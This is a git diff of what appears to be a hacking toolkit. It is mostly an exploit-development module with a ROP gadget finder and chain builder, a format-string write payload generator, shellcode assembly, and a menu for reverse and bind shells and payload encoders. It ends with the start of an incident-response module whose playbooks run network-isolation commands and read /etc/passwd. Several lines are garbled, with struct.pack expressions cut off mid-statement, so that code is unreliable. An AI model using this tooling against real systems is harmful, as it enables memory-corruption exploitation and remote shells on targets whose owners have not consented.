value[2:] + if len(hex_str) % 2 != 0: + hex_str = '0' + hex_str + try: + raw = bytes.fromhex(hex_str) + search_strings.append(raw.decode('ascii', errors='replace')) + # Also try reversed (little-endian) + search_strings.append(raw[::-1].decode('ascii', errors='replace')) + except (ValueError, UnicodeDecodeError): + pass + elif all(c in '0123456789abcdefABCDEF' for c in value) and len(value) >= 4: + # Pure hex without prefix + try: + raw = bytes.fromhex(value) + search_strings.append(raw.decode('ascii', errors='replace')) + search_strings.append(raw[::-1].decode('ascii', errors='replace')) + except (ValueError, UnicodeDecodeError): + pass + + # Integer + try: + int_val = int(value, 0) + for width in (4, 8): + try: + packed_le = struct.pack(f'<{"I" if width == 4 else "Q"}', int_val & (2**(width*8)-1)) + search_strings.append(packed_le.decode('ascii', errors='replace')) + packed_be = struct.pack(f'>{"I" if width == 4 else "Q"}', int_val & (2**(width*8)-1)) + search_strings.append(packed_be.decode('ascii', errors='replace')) + except (struct.error, OverflowError): + pass + except (ValueError, OverflowError): + pass + + # Direct string search + search_strings.append(value) + + elif isinstance(value, int): + for width in (4, 8): + try: + packed = struct.pack(f'<{"I" if width == 4 else "Q"}', value & (2**(width*8)-1)) + search_strings.append(packed.decode('ascii', errors='replace')) + except (struct.error, OverflowError): + pass + + # Search + for needle in search_strings: + offset = pattern.find(needle) + if offset != -1: + return { + 'offset': offset, + 'value': value if isinstance(value, str) else hex(value), + 'matched': needle, + 'matched_hex': needle.encode('ascii', errors='replace').hex(), + 'endian': 'little-endian' if search_strings.index(needle) % 2 == 1 else 'big-endian', + 'pattern_length': len(pattern), + } + + return { + 'offset': -1, + 'error': f'Value {value} not found in pattern of length {len(pattern)}', + 'value': str(value), + 'pattern_length': len(pattern), + } + + # ----------------------------------------------------------------------- + # ROP Gadget Finding + # ----------------------------------------------------------------------- + + def find_rop_gadgets(self, binary_path, gadget_type=None, max_gadgets=200): + """Find ROP gadgets in a binary. + + Args: + binary_path: path to ELF/PE binary + gadget_type: None (all), pop_ret, xchg, mov, syscall, jmp_esp, call_reg + max_gadgets: maximum gadgets to return + + Returns: + dict with list of gadgets + """ + if not os.path.isfile(binary_path): + return {'error': f'File not found: {binary_path}'} + + # Try ropper first + ropper_path = find_tool('ropper') + if ropper_path: + return self._find_gadgets_ropper(binary_path, gadget_type, max_gadgets) + + # Try ROPgadget + ropgadget_path = find_tool('ROPgadget') + if ropgadget_path: + return self._find_gadgets_ropgadget(binary_path, gadget_type, max_gadgets) + + # Fallback: objdump + regex + objdump_path = find_tool('objdump') + if objdump_path: + return self._find_gadgets_objdump(binary_path, gadget_type, max_gadgets) + + return {'error': 'No disassembler found. Install ropper, ROPgadget, or objdump.'} + + def _find_gadgets_ropper(self, binary_path, gadget_type, max_gadgets): + """Find gadgets using ropper.""" + cmd = [find_tool('ropper'), '-f', binary_path, '--nocolor'] + if gadget_type: + search_map = { + 'pop_ret': 'pop', + 'xchg': 'xchg', + 'mov': 'mov', + 'syscall': 'syscall', + 'jmp_esp': 'jmp esp', + 'call_reg': 'call', + } + search_term = search_map.get(gadget_type, gadget_type) + cmd.extend(['--search', search_term]) + + try: + result = subprocess.run(cmd, capture_output=True, text=True, timeout=60) + lines = result.stdout.strip().split('\n') + except (subprocess.TimeoutExpired, FileNotFoundError): + return {'error': 'ropper execution failed'} + + gadgets = [] + for line in lines: + line = line.strip() + if not line or line.startswith('=') or line.startswith('Gadgets') or line.startswith('['): + continue + # Parse: 0xaddress: instruction; instruction; ret; + match = re.match(r'(0x[0-9a-fA-F]+):\s+(.*)', line) + if match: + addr = match.group(1) + instr = match.group(2).strip().rstrip(';').strip() + gtype = self._classify_gadget(instr) + gadgets.append({ + 'address': addr, + 'gadget': instr, + 'type': gtype, + }) + if len(gadgets) >= max_gadgets: + break + + return { + 'binary': binary_path, + 'tool': 'ropper', + 'count': len(gadgets), + 'gadgets': gadgets, + } + + def _find_gadgets_ropgadget(self, binary_path, gadget_type, max_gadgets): + """Find gadgets using ROPgadget.""" + cmd = [find_tool('ROPgadget'), '--binary', binary_path] + + try: + result = subprocess.run(cmd, capture_output=True, text=True, timeout=60) + lines = result.stdout.strip().split('\n') + except (subprocess.TimeoutExpired, FileNotFoundError): + return {'error': 'ROPgadget execution failed'} + + gadgets = [] + for line in lines: + line = line.strip() + match = re.match(r'(0x[0-9a-fA-F]+)\s+:\s+(.*)', line) + if match: + addr = match.group(1) + instr = match.group(2).strip() + gtype = self._classify_gadget(instr) + if gadget_type and gtype != gadget_type: + continue + gadgets.append({ + 'address': addr, + 'gadget': instr, + 'type': gtype, + }) + if len(gadgets) >= max_gadgets: + break + + return { + 'binary': binary_path, + 'tool': 'ROPgadget', + 'count': len(gadgets), + 'gadgets': gadgets, + } + + def _find_gadgets_objdump(self, binary_path, gadget_type, max_gadgets): + """Find gadgets using objdump disassembly + regex search.""" + objdump = find_tool('objdump') + try: + result = subprocess.run( + [objdump, '-d', '-M', 'intel', binary_path], + capture_output=True, text=True, timeout=120 + ) + disasm = result.stdout + except (subprocess.TimeoutExpired, FileNotFoundError): + return {'error': 'objdump execution failed'} + + # Parse disassembly for gadget-ending instructions + gadget_endings = { + 'ret': re.compile(r'ret\s*$'), + 'syscall': re.compile(r'syscall\s*$'), + 'int 0x80': re.compile(r'int\s+0x80\s*$'), + } + + lines = disasm.split('\n') + gadgets = [] + + for i, line in enumerate(lines): + line = line.strip() + # Check if this line ends a gadget + for ending_name, ending_re in gadget_endings.items(): + instr_match = re.match(r'\s*([0-9a-fA-F]+):\s+((?:[0-9a-fA-F]{2}\s)+)\s+(.*)', line) + if not instr_match: + continue + instr_text = instr_match.group(3).strip() + if not ending_re.search(instr_text): + continue + + addr = instr_match.group(1) + + # Look back up to 5 instructions for the gadget chain + chain = [] + for j in range(max(0, i - 5), i + 1): + prev = lines[j].strip() + pm = re.match(r'\s*([0-9a-fA-F]+):\s+((?:[0-9a-fA-F]{2}\s)+)\s+(.*)', prev) + if pm: + chain.append(pm.group(3).strip()) + + for start_idx in range(len(chain)): + gadget_str = ' ; '.join(chain[start_idx:]) + gtype = self._classify_gadget(gadget_str) + if gadget_type and gtype != gadget_type: + continue + + # Get the address of the first instruction + lookback = lines[max(0, i - 5) + start_idx].strip() + am = re.match(r'\s*([0-9a-fA-F]+):', lookback) + gaddr = f'0x{am.group(1)}' if am else f'0x{addr}' + + gadgets.append({ + 'address': gaddr, + 'gadget': gadget_str, + 'type': gtype, + }) + if len(gadgets) >= max_gadgets: + break + if len(gadgets) >= max_gadgets: + break + if len(gadgets) >= max_gadgets: + break + + # Deduplicate + seen = set() + unique = [] + for g in gadgets: + key = g['address'] + g['gadget'] + if key not in seen: + seen.add(key) + unique.append(g) + + return { + 'binary': binary_path, + 'tool': 'objdump', + 'count': len(unique), + 'gadgets': unique, + } + + def _classify_gadget(self, gadget_str): + """Classify a gadget by its instruction pattern.""" + g = gadget_str.lower() + if re.search(r'pop\s+\w+.*ret', g): + return 'pop_ret' + if 'xchg' in g: + return 'xchg' + if 'syscall' in g or 'int 0x80' in g: + return 'syscall' + if re.search(r'jmp\s+(esp|rsp)', g): + return 'jmp_esp' + if re.search(r'call\s+(eax|ebx|ecx|edx|esi|edi|rax|rbx|rcx|rdx|rsi|rdi|r\d+)', g): + return 'call_reg' + if 'mov' in g: + return 'mov' + if 'ret' in g: + return 'ret' + return 'other' + + # ----------------------------------------------------------------------- + # ROP Chain Builder + # ----------------------------------------------------------------------- + + def build_rop_chain(self, gadgets, chain_spec): + """Assemble a ROP chain from gadgets and a chain specification. + + Args: + gadgets: list of gadget dicts (address, gadget, type) + chain_spec: list of dicts describing desired chain: + [ + {'gadget_type': 'pop_ret', 'register': 'rdi', 'value': '0x...'}, + {'gadget_type': 'pop_ret', 'register': 'rsi', 'value': '0x...'}, + {'gadget_type': 'syscall'}, + ... + ] + + Returns: + dict with chain bytes, addresses, and debug info + """ + if not gadgets: + return {'error': 'No gadgets provided'} + if not chain_spec: + return {'error': 'No chain specification provided'} + + # Index gadgets by type + by_type = {} + for g in gadgets: + gtype = g.get('type', 'other') + by_type.setdefault(gtype, []).append(g) + + chain_addrs = [] + chain_bytes = b'' + debug_lines = [] + + for step in chain_spec: + gtype = step.get('gadget_type', step.get('type', 'pop_ret')) + register = step.get('register', '').lower() + value = step.get('value', '0') + + # Find matching gadget + candidates = by_type.get(gtype, []) + if register: + # Filter by register in gadget text + reg_candidates = [g for g in candidates if register in g['gadget'].lower()] + if reg_candidates: + candidates = reg_candidates + + if not candidates: + debug_lines.append(f'[!] No gadget found for: {gtype} {register}') + continue + + gadget = candidates[0] # Use first match + addr_int = int(gadget['address'], 16) + + # Determine address width (4 or 8 bytes) + if addr_int > 0xFFFFFFFF: + addr_bytes = struct.pack(' 0xFFFFFFFF: + chain_bytes += struct.pack(' 0x{val_int:x}') + + return { + 'chain_hex': chain_bytes.hex(), + 'chain_length': len(chain_bytes), + 'addresses': chain_addrs, + 'steps': len(chain_spec), + 'matched': len(chain_addrs), + 'debug': '\n'.join(debug_lines), + 'python': self._chain_to_python(chain_bytes), + } + + def _chain_to_python(self, chain_bytes): + """Convert chain bytes to Python struct.pack() calls.""" + lines = ['from struct import pack', '', 'chain = b""'] + width = 8 if len(chain_bytes) > 4 and len(chain_bytes) % 8 == 0 else 4 + fmt = '> 16) & 0xFFFF + + addr_low = struct.pack(' 0: + payload_parts_32.append(f'%{pad}c') + payload_parts_32.append(f'%{off}$hn') + current = val + + payload_32 = addr_low.hex() + addr_high.hex() + ''.join(payload_parts_32) + results['payload_32bit'] = { + 'payload': payload_32, + 'description': f'Write 0x{value:08x} to 0x{address:08x} (32-bit, two %hn writes)', + 'addresses': f'0x{address:08x}, 0x{address + 2:08x}', + } + + # 64-bit write (write 8 bytes as four %hn writes) + words_64 = [] + for i in range(4): + word = (value >> (i * 16)) & 0xFFFF + addr_part = struct.pack(' 0: + payload_parts_64.append(f'%{pad}c') + payload_parts_64.append(f'%{off}$hn') + current = val + + addrs_hex = ''.join(w[1].hex() for w in words_64) + payload_64 = addrs_hex + ''.join(payload_parts_64) + results['payload_64bit'] = { + 'payload': payload_64, + 'description': f'Write 0x{value:016x} to 0x{address:016x} (64-bit, four %hn writes)', + } + + return results + + # ----------------------------------------------------------------------- + # Assembly / Disassembly + # ----------------------------------------------------------------------- + + def assemble(self, code, arch='x64'): + """Assemble assembly code to machine code bytes. + + Args: + code: assembly source (NASM syntax) + arch: x86, x64, arm + + Returns: + dict with hex bytes, raw length, and disassembly + """ + if not code or not code.strip(): + return {'error': 'No assembly code provided'} + + arch = arch.lower().strip() + nasm = find_tool('nasm') + objcopy = find_tool('objcopy') + + if nasm and objcopy: + return self._assemble_nasm(code, arch, nasm, objcopy) + + # Try keystone-engine + try: + import keystone + return self._assemble_keystone(code, arch) + except ImportError: + pass + + return { + 'error': 'No assembler available. Install nasm + objcopy, or pip install keystone-engine.' + } + + def _assemble_nasm(self, code, arch, nasm_path, objcopy_path): + """Assemble using NASM.""" + # Set BITS directive based on arch + bits_map = {'x86': '32', 'x64': '64', 'i386': '32', 'amd64': '64'} + bits = bits_map.get(arch, '64') + + # Prepend BITS directive if not already present + if 'bits' not in code.lower(): + code = f'BITS {bits}\n{code}' + + with tempfile.NamedTemporaryFile(suffix='.asm', mode='w', delete=False) as f: + f.write(code) + asm_path = f.name + + obj_path = asm_path.replace('.asm', '.o') + bin_path = asm_path.replace('.asm', '.bin') + + try: + # Assemble + result = subprocess.run( + [nasm_path, '-f', 'bin', '-o', bin_path, asm_path], + capture_output=True, text=True, timeout=10 + ) + if result.returncode != 0: + return {'error': f'NASM error: {result.stderr.strip()}'} + + # Read binary output + with open(bin_path, 'rb') as bf: + machine_code = bf.read() + + return { + 'hex': machine_code.hex(), + 'bytes': list(machine_code), + 'length': len(machine_code), + 'arch': arch, + 'c_array': ', '.join(f'0x{b:02x}' for b in machine_code), + 'python': 'b"' + ''.join(f'\\x{b:02x}' for b in machine_code) + '"', + } + + except subprocess.TimeoutExpired: + return {'error': 'Assembly timed out'} + finally: + for p in (asm_path, obj_path, bin_path): + try: + os.unlink(p) + except OSError: + pass + + def _assemble_keystone(self, code, arch): + """Assemble using keystone-engine.""" + import keystone + + arch_map = { + 'x86': (keystone.KS_ARCH_X86, keystone.KS_MODE_32), + 'x64': (keystone.KS_ARCH_X86, keystone.KS_MODE_64), + 'arm': (keystone.KS_ARCH_ARM, keystone.KS_MODE_ARM), + } + ks_arch, ks_mode = arch_map.get(arch, (keystone.KS_ARCH_X86, keystone.KS_MODE_64)) + + try: + ks = keystone.Ks(ks_arch, ks_mode) + encoding, count = ks.asm(code) + machine_code = bytes(encoding) + + return { + 'hex': machine_code.hex(), + 'bytes': list(machine_code), + 'length': len(machine_code), + 'arch': arch, + 'instructions': count, + 'c_array': ', '.join(f'0x{b:02x}' for b in machine_code), + 'python': 'b"' + ''.join(f'\\x{b:02x}' for b in machine_code) + '"', + } + except keystone.KsError as e: + return {'error': f'Keystone error: {e}'} + + def disassemble(self, data, arch='x64', offset=0): + """Disassemble machine code bytes to assembly. + + Args: + data: hex string or bytes + arch: x86, x64, arm + offset: base address offset + + Returns: + dict with disassembly listing + """ + if isinstance(data, str): + data = data.strip().replace(' ', '').replace('\\x', '') + try: + data = bytes.fromhex(data) + except ValueError: + return {'error': 'Invalid hex data'} + + if not data: + return {'error': 'No data to disassemble'} + + arch = arch.lower().strip() + offset = int(offset) + + # Try capstone first + try: + import capstone + return self._disasm_capstone(data, arch, offset) + except ImportError: + pass + + # Fallback to objdump + objdump = find_tool('objdump') + if objdump: + return self._disasm_objdump(data, arch, offset) + + # Last resort: manual byte-by-byte display + return self._disasm_basic(data, arch, offset) + + def _disasm_capstone(self, data, arch, offset): + """Disassemble using capstone.""" + import capstone + + arch_map = { + 'x86': (capstone.CS_ARCH_X86, capstone.CS_MODE_32), + 'x64': (capstone.CS_ARCH_X86, capstone.CS_MODE_64), + 'arm': (capstone.CS_ARCH_ARM, capstone.CS_MODE_ARM), + } + cs_arch, cs_mode = arch_map.get(arch, (capstone.CS_ARCH_X86, capstone.CS_MODE_64)) + + md = capstone.Cs(cs_arch, cs_mode) + md.detail = False + + instructions = [] + for addr, size, mnemonic, op_str in md.disasm_lite(data, offset): + instr_bytes = data[addr - offset:addr - offset + size] + instructions.append({ + 'address': f'0x{addr:08x}', + 'bytes': instr_bytes.hex(), + 'mnemonic': mnemonic, + 'operands': op_str, + 'text': f'{mnemonic} {op_str}'.strip(), + }) + + listing = '\n'.join( + f'{i["address"]}: {i["bytes"]:<20s} {i["text"]}' + for i in instructions + ) + + return { + 'instructions': instructions, + 'listing': listing, + 'count': len(instructions), + 'arch': arch, + 'tool': 'capstone', + 'data_length': len(data), + } + + def _disasm_objdump(self, data, arch, offset): + """Disassemble using objdump.""" + objdump = find_tool('objdump') + + with tempfile.NamedTemporaryFile(suffix='.bin', delete=False) as f: + f.write(data) + bin_path = f.name + + arch_map = {'x86': 'i386', 'x64': 'i386:x86-64', 'arm': 'arm'} + obj_arch = arch_map.get(arch, 'i386:x86-64') + + try: + result = subprocess.run( + [objdump, '-D', '-b', 'binary', '-m', obj_arch, + '-M', 'intel', '--adjust-vma', str(offset), bin_path], + capture_output=True, text=True, timeout=10 + ) + lines = result.stdout.strip().split('\n') + + instructions = [] + for line in lines: + match = re.match(r'\s*([0-9a-fA-F]+):\s+((?:[0-9a-fA-F]{2}\s)+)\s+(.*)', line) + if match: + addr = match.group(1) + raw_bytes = match.group(2).strip() + instr = match.group(3).strip() + instructions.append({ + 'address': f'0x{addr}', + 'bytes': raw_bytes.replace(' ', ''), + 'text': instr, + }) + + listing = '\n'.join( + f'{i["address"]}: {i["bytes"]:<20s} {i["text"]}' + for i in instructions + ) + + return { + 'instructions': instructions, + 'listing': listing, + 'count': len(instructions), + 'arch': arch, + 'tool': 'objdump', + 'data_length': len(data), + } + except subprocess.TimeoutExpired: + return {'error': 'Disassembly timed out'} + finally: + try: + os.unlink(bin_path) + except OSError: + pass + + def _disasm_basic(self, data, arch, offset): + """Basic hex dump when no disassembler is available.""" + listing_lines = [] + for i in range(0, len(data), 16): + chunk = data[i:i + 16] + addr = offset + i + hex_part = ' '.join(f'{b:02x}' for b in chunk) + ascii_part = ''.join(chr(b) if 32 <= b < 127 else '.' for b in chunk) + listing_lines.append(f'0x{addr:08x}: {hex_part:<48s} {ascii_part}') + + return { + 'instructions': [], + 'listing': '\n'.join(listing_lines), + 'count': 0, + 'arch': arch, + 'tool': 'hex_dump (no disassembler available)', + 'data_length': len(data), + 'note': 'Install capstone or objdump for proper disassembly.', + } + + # ----------------------------------------------------------------------- + # Hex Dump + # ----------------------------------------------------------------------- + + def hex_dump(self, data, offset=0): + """Format bytes as a hex dump with ASCII sidebar. + + Args: + data: bytes or hex string + offset: starting address offset + + Returns: + dict with formatted hex dump string + """ + if isinstance(data, str): + data = bytes.fromhex(data.replace(' ', '').replace('\\x', '')) + + lines = [] + for i in range(0, len(data), 16): + chunk = data[i:i + 16] + addr = offset + i + hex_part = ' '.join(f'{b:02x}' for b in chunk) + # Pad short lines + hex_part = f'{hex_part:<48s}' + ascii_part = ''.join(chr(b) if 32 <= b < 127 else '.' for b in chunk) + lines.append(f'{addr:08x} {hex_part} |{ascii_part}|') + + return { + 'dump': '\n'.join(lines), + 'length': len(data), + 'offset': offset, + } + + # ----------------------------------------------------------------------- + # CLI interface + # ----------------------------------------------------------------------- + + +def run(): + """CLI menu for exploit development toolkit.""" + dev = get_exploit_dev() + + while True: + clear_screen() + display_banner() + print(f"\n{Colors.RED}{Colors.BOLD} Exploit Development Toolkit{Colors.RESET}") + print(f"{Colors.DIM} Shellcode, encoders, ROP chains, patterns{Colors.RESET}") + print(f"\n{Colors.CYAN} 1{Colors.RESET} Shellcode Generator") + print(f"{Colors.CYAN} 2{Colors.RESET} Payload Encoder") + print(f"{Colors.CYAN} 3{Colors.RESET} Pattern Create") + print(f"{Colors.CYAN} 4{Colors.RESET} Pattern Offset") + print(f"{Colors.CYAN} 5{Colors.RESET} ROP Gadgets") + print(f"{Colors.CYAN} 6{Colors.RESET} Disassemble") + print(f"{Colors.CYAN} 0{Colors.RESET} Back") + + choice = input(f"\n{Colors.WHITE} [{Colors.RED}exploit-dev{Colors.WHITE}]> {Colors.RESET}").strip() + + if choice == '0': + break + elif choice == '1': + _cli_shellcode(dev) + elif choice == '2': + _cli_encoder(dev) + elif choice == '3': + _cli_pattern_create(dev) + elif choice == '4': + _cli_pattern_offset(dev) + elif choice == '5': + _cli_rop_gadgets(dev) + elif choice == '6': + _cli_disassemble(dev) + + +def _cli_shellcode(dev): + """CLI: Shellcode generator.""" + print(f"\n{Colors.BOLD}Available shellcode templates:{Colors.RESET}") + for sc in dev.list_shellcodes(): + print(f" {Colors.CYAN}{sc['name']}{Colors.RESET} — {sc['description']} ({sc['length']} bytes)") + + shell_type = input(f"\n{Colors.WHITE}Shell type (reverse_shell/bind_shell/execve): {Colors.RESET}").strip() or 'execve' + arch = input(f"{Colors.WHITE}Architecture (x86/x64/arm): {Colors.RESET}").strip() or 'x64' + platform = input(f"{Colors.WHITE}Platform (linux/windows): {Colors.RESET}").strip() or 'linux' + host = input(f"{Colors.WHITE}Host IP (for reverse/bind, or skip): {Colors.RESET}").strip() + port = input(f"{Colors.WHITE}Port (for reverse/bind, or skip): {Colors.RESET}").strip() + fmt = input(f"{Colors.WHITE}Output format (hex/c_array/python/nasm): {Colors.RESET}").strip() or 'hex' + + result = dev.generate_shellcode(shell_type, arch, host or None, port or None, platform, output_format=fmt) + if 'error' in result: + print(f"\n{Colors.RED}Error: {result['error']}{Colors.RESET}") + else: + print(f"\n{Colors.GREEN}[+] Generated {result['length']} bytes ({result['template']}){Colors.RESET}") + print(f"{Colors.DIM}{result['description']}{Colors.RESET}") + print(f"\n{result['shellcode']}") + + input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}") + + +def _cli_encoder(dev): + """CLI: Payload encoder.""" + sc_hex = input(f"\n{Colors.WHITE}Shellcode (hex): {Colors.RESET}").strip() + if not sc_hex: + return + encoder = input(f"{Colors.WHITE}Encoder (xor/aes/alphanumeric/polymorphic): {Colors.RESET}").strip() or 'xor' + key = input(f"{Colors.WHITE}Key (hex/string, or blank for random): {Colors.RESET}").strip() or None + iters = input(f"{Colors.WHITE}Iterations (default 1): {Colors.RESET}").strip() or '1' + + result = dev.encode_payload(sc_hex, encoder, key, int(iters)) + if 'error' in result: + print(f"\n{Colors.RED}Error: {result['error']}{Colors.RESET}") + else: + print(f"\n{Colors.GREEN}[+] Encoded: {result['original_length']} -> {result['encoded_length']} bytes ({result['size_increase']}){Colors.RESET}") + print(f"Key: {result['key']}") + print(f"Null-free: {result['null_free']}") + print(f"\n{Colors.CYAN}Decoder Stub:{Colors.RESET}\n{result['decoder_stub']}") + print(f"\n{Colors.CYAN}Encoded payload (hex):{Colors.RESET}\n{result['encoded']}") + + input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}") + + +def _cli_pattern_create(dev): + """CLI: Pattern create.""" + length = input(f"\n{Colors.WHITE}Pattern length: {Colors.RESET}").strip() + if not length: + return + result = dev.generate_pattern(int(length)) + if 'error' in result: + print(f"\n{Colors.RED}Error: {result['error']}{Colors.RESET}") + else: + print(f"\n{Colors.GREEN}[+] Pattern ({result['length']} bytes):{Colors.RESET}") + print(result['pattern']) + + input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}") + + +def _cli_pattern_offset(dev): + """CLI: Pattern offset finder.""" + value = input(f"\n{Colors.WHITE}Value to find (hex/int/string): {Colors.RESET}").strip() + if not value: + return + length = input(f"{Colors.WHITE}Pattern length (default 20000): {Colors.RESET}").strip() or '20000' + result = dev.find_pattern_offset(value, int(length)) + if result.get('offset', -1) >= 0: + print(f"\n{Colors.GREEN}[+] Found at offset: {result['offset']}{Colors.RESET}") + print(f" Matched: {result['matched']} ({result['endian']})") + else: + print(f"\n{Colors.RED}{result.get('error', 'Not found')}{Colors.RESET}") + + input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}") + + +def _cli_rop_gadgets(dev): + """CLI: ROP gadget finder.""" + binary = input(f"\n{Colors.WHITE}Binary path: {Colors.RESET}").strip() + if not binary: + return + gtype = input(f"{Colors.WHITE}Gadget type (all/pop_ret/xchg/mov/syscall/jmp_esp/call_reg): {Colors.RESET}").strip() + if gtype in ('', 'all'): + gtype = None + result = dev.find_rop_gadgets(binary, gtype) + if 'error' in result: + print(f"\n{Colors.RED}Error: {result['error']}{Colors.RESET}") + else: + print(f"\n{Colors.GREEN}[+] Found {result['count']} gadgets (via {result['tool']}){Colors.RESET}\n") + for g in result['gadgets'][:50]: + print(f" {Colors.CYAN}{g['address']}{Colors.RESET}: {g['gadget']} [{g['type']}]") + if result['count'] > 50: + print(f"\n ... and {result['count'] - 50} more") + + input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}") + + +def _cli_disassemble(dev): + """CLI: Disassemble hex bytes.""" + hex_data = input(f"\n{Colors.WHITE}Hex bytes: {Colors.RESET}").strip() + if not hex_data: + return + arch = input(f"{Colors.WHITE}Architecture (x86/x64/arm): {Colors.RESET}").strip() or 'x64' + result = dev.disassemble(hex_data, arch) + if 'error' in result: + print(f"\n{Colors.RED}Error: {result['error']}{Colors.RESET}") + else: + print(f"\n{Colors.GREEN}[+] {result['count']} instructions (via {result['tool']}){Colors.RESET}\n") + print(result['listing']) + + input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}") + + +# --------------------------------------------------------------------------- +# Singleton +# --------------------------------------------------------------------------- + +_instance = None + + +def get_exploit_dev() -> ExploitDev: + """Get singleton ExploitDev instance.""" + global _instance + if _instance is None: + _instance = ExploitDev() + return _instance diff --git a/modules/incident_resp.py b/modules/incident_resp.py new file mode 100644 index 0000000..613e624 --- /dev/null +++ b/modules/incident_resp.py @@ -0,0 +1,1555 @@ +"""AUTARCH Incident Response + +IR playbook runner, evidence collection, IOC sweeping, timeline building, +containment actions, and post-incident reporting for security operations. +""" + +import os +import sys +import json +import time +import platform +import subprocess +import re +import hashlib +import shutil +from pathlib import Path +from datetime import datetime, timezone +from collections import defaultdict + +# Module metadata +DESCRIPTION = "Incident response — playbooks, evidence & containment" +AUTHOR = "darkHal" +VERSION = "1.0" +CATEGORY = "defense" + +sys.path.insert(0, str(Path(__file__).parent.parent)) + +try: + from core.paths import get_data_dir +except ImportError: + def get_data_dir(): + return str(Path(__file__).parent.parent / 'data') + +try: + from core.banner import Colors, clear_screen, display_banner +except ImportError: + class Colors: + RED = YELLOW = GREEN = CYAN = BLUE = MAGENTA = WHITE = DIM = BOLD = RESET = '' + def clear_screen(): pass + def display_banner(): pass + +_is_win = platform.system() == 'Windows' + +# ── Valid enumerations ────────────────────────────────────────────── + +INCIDENT_TYPES = [ + 'ransomware', 'data_breach', 'insider_threat', 'ddos', + 'account_compromise', 'malware', 'phishing', 'unauthorized_access', +] + +SEVERITY_LEVELS = ['critical', 'high', 'medium', 'low'] + +STATUS_VALUES = ['open', 'investigating', 'contained', 'resolved', 'closed'] + +EVIDENCE_TYPES = [ + 'system_logs', 'process_list', 'network_connections', 'running_services', + 'user_accounts', 'scheduled_tasks', 'recent_files', 'memory_info', + 'disk_info', 'installed_software', +] + + +# ── Playbooks ─────────────────────────────────────────────────────── + +IR_PLAYBOOKS = { + 'ransomware': { + 'name': 'Ransomware Response', + 'steps': [ + { + 'title': 'Isolate Affected Systems', + 'description': 'Immediately disconnect infected hosts from the network to prevent lateral movement and further encryption. Disable WiFi adapters and unplug Ethernet cables. Add firewall rules to block the host if remote.', + 'check_items': ['Disconnect from network', 'Disable WiFi adapters', 'Block at firewall', 'Disable shared drives/NFS mounts'], + 'automated': True, + 'commands': ['netsh interface set interface "Wi-Fi" disable' if _is_win else 'nmcli radio wifi off', + 'netsh advfirewall set allprofiles state on' if _is_win else 'iptables -P INPUT DROP && iptables -P OUTPUT DROP && iptables -P FORWARD DROP'], + }, + { + 'title': 'Preserve Evidence', + 'description': 'Capture volatile evidence before any remediation. Collect running processes, network connections, memory state, and ransom notes. Photograph any ransom screens.', + 'check_items': ['Capture process list', 'Capture network connections', 'Save ransom note text', 'Screenshot ransom screen', 'Record system time and timezone'], + 'automated': True, + 'commands': ['tasklist /v' if _is_win else 'ps auxf', + 'netstat -anob' if _is_win else 'ss -tulnp'], + }, + { + 'title': 'Identify Ransomware Variant', + 'description': 'Determine the ransomware family by examining the ransom note, encrypted file extensions, and behavior. Check ID Ransomware (id-ransomware.malwarehunterteam.com) and No More Ransom (nomoreransom.org) for known decryptors.', + 'check_items': ['Note encrypted file extension', 'Identify ransom note filename', 'Check ID Ransomware', 'Check No More Ransom project', 'Search threat intelligence feeds'], + 'automated': False, + 'commands': [], + }, + { + 'title': 'Assess Scope of Impact', + 'description': 'Determine which systems, shares, and data have been affected. Check backup integrity. Identify the initial infection vector (email attachment, RDP, exploit kit).', + 'check_items': ['Enumerate affected hosts', 'Check shared drive encryption status', 'Verify backup integrity', 'Identify infection vector', 'Determine data classification of affected files'], + 'automated': False, + 'commands': [], + }, + { + 'title': 'Eradicate Ransomware', + 'description': 'Remove the ransomware binary, persistence mechanisms, and any related malware. Scan all systems with updated AV signatures. Check scheduled tasks, startup items, and registry run keys.', + 'check_items': ['Identify and remove ransomware executable', 'Clear persistence mechanisms', 'Scan with updated AV signatures', 'Check scheduled tasks', 'Check registry run keys (Windows)', 'Check crontabs (Linux)'], + 'automated': True, + 'commands': ['schtasks /query /fo LIST /v' if _is_win else 'crontab -l 2>/dev/null; ls -la /etc/cron.*/ 2>/dev/null'], + }, + { + 'title': 'Restore and Recover', + 'description': 'Restore affected systems from clean backups. Rebuild compromised systems if needed. Verify restored data integrity and gradually reconnect to the network.', + 'check_items': ['Restore from verified clean backup', 'Rebuild if no clean backup available', 'Verify data integrity post-restore', 'Patch vulnerability used for initial access', 'Reconnect to network gradually'], + 'automated': False, + 'commands': [], + }, + { + 'title': 'Post-Incident Review', + 'description': 'Conduct lessons learned meeting. Update IR playbook. Improve detection and prevention controls. Document full timeline for legal/compliance.', + 'check_items': ['Schedule lessons learned meeting', 'Update detection rules', 'Improve email filtering', 'Review backup strategy', 'Document full incident timeline', 'File regulatory notifications if required'], + 'automated': False, + 'commands': [], + }, + ], + }, + 'data_breach': { + 'name': 'Data Breach Response', + 'steps': [ + { + 'title': 'Confirm and Scope the Breach', + 'description': 'Verify that a data breach has occurred. Determine what data was accessed or exfiltrated, which systems were involved, and the approximate timeframe.', + 'check_items': ['Verify breach indicators', 'Identify affected systems', 'Determine data types exposed', 'Establish breach timeframe', 'Check access logs for unauthorized activity'], + 'automated': True, + 'commands': ['wevtutil qe Security /c:50 /f:text /rd:true' if _is_win else 'grep -i "authentication failure\\|invalid user\\|unauthorized" /var/log/auth.log 2>/dev/null | tail -50'], + }, + { + 'title': 'Contain the Breach', + 'description': 'Stop ongoing data exfiltration. Revoke compromised credentials, block attacker IPs, disable compromised accounts, and segment affected network areas.', + 'check_items': ['Block attacker IP addresses', 'Revoke compromised API keys/tokens', 'Disable compromised user accounts', 'Segment affected network zones', 'Enable enhanced logging'], + 'automated': True, + 'commands': ['netstat -anob' if _is_win else 'ss -tulnp', + 'net user' if _is_win else 'cat /etc/passwd | grep -v nologin | grep -v false'], + }, + { + 'title': 'Preserve Evidence', + 'description': 'Secure all evidence for potential legal proceedings. Create forensic images, preserve logs, and maintain chain of custody documentation.', + 'check_items': ['Create forensic disk images', 'Preserve all relevant logs', 'Document chain of custody', 'Capture network traffic logs', 'Save database query logs'], + 'automated': False, + 'commands': [], + }, + { + 'title': 'Assess Data Impact', + 'description': 'Classify the types and volume of data compromised. Determine if PII, PHI, financial data, or 